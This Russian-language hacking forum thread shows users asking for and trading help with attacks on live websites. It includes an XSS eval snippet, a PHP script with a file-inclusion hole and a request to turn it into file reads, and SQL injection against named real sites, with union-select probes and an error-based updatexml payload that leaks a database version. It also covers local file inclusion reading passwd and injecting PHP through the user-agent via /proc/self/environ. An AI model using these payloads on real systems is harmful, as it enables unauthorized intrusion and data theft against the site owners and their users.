Можнно использовать в каком-либо теге: Code: onload='eva("\x01\x02\x03")' И вставлять либо с помощью getElementById или любым удобным способом.
Помогите получить чтение файлов через этот скрипт. Ковычки экранируются. index.php?id=15&pr=d' Код самого скрипта: PHP: <?php // if url then do info page if (isset($_GET['url'])) { include_once("includes/info.inc.php"); } else { // else do profiles alphabet if(isset($_GET['pr'])){ $letter = $_GET['pr']; if($letter == "all"){ include_once("includes/profiles/all.html"); } else{ $thefile = "includes/profiles/$letter.html"; $fp = fopen($thefile,"r"); if(filesize($thefile) > 200){ $data = fread($fp, filesize($thefile)); echo "$data"; } else{ echo "There are no users starting with $letter."; } fclose($fp); } } else { include_once("includes/profiles/page.html"); } } ?> Я нашел чтение файлов через другой скриптец, но там криво читает некоторые файлы(начинает не с начала). Код вот этого удалось получить нормально, надеюсь через него получить полноценное чтение.
Данные в php скрипте фильтруюца такой рег-кой, PHP: /(\W|\_)/ , можно ли обойти как-то(необходимо кавычку всунуть) или как-то выйти за кавчку в sql запросе. С наступающим!
Всем привет! http://www.mobile-review.com/cgi-bin/presents2012.pl?"&option=redirect реально раскрутить sqli?
Добрый день! Помогите со скулей. union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ни в какую не хочет пропускать круглые скобочки. Возвращает просто пустую страницу. Работает с @@version, кстати вернуло 5.0.51a-24+lenny2+spu1 (Web Server: Apache/2.2.9 (Debian))
видимо я не так выразился.... в адресную строку вообще НИКАК нельзя писать скобочки, возвращает пустую страницу не пропускает именно вместе скобки открывающуюся с закрывающейся, по отдельности работает но только толку от этого ноль
Помогите подобрать количество полей в: Code: http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=-1'
Только через Error-Based: Code: http://mcdonalds.md/products/getallcategory?ascendent=1&category=1|2|3|4&idB=0&order=1 and updatexml(0x3a,concat(0x3a,[COLOR=Red]version()[/COLOR]),0x3a)# XPATH syntax error: ':5.1.61'
А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод? П.С. Спасибо за быстрый ответ на прошлый вопрос.
Для общего понимания: https://forum.antichat.ru/showpost.php?p=407227&postcount=3 для Болие детального понимания нужна понимать суть синтаксиса Mysql, т.е как правельно делоть запросы к бд и понимать как получается вывод...
День добрый. Если есть доступ к proc/self/environ%00 с вывобом user-agent возможно посмотреть phpinfo заменой агента на <?php phpinfo();?>? Или не должно выводить?
Нашел LFI: passwd отлично смотрится, но в ответ на возвращается пустая страница. Значит нет прав и нет смысла пытаться подменить user-agent?
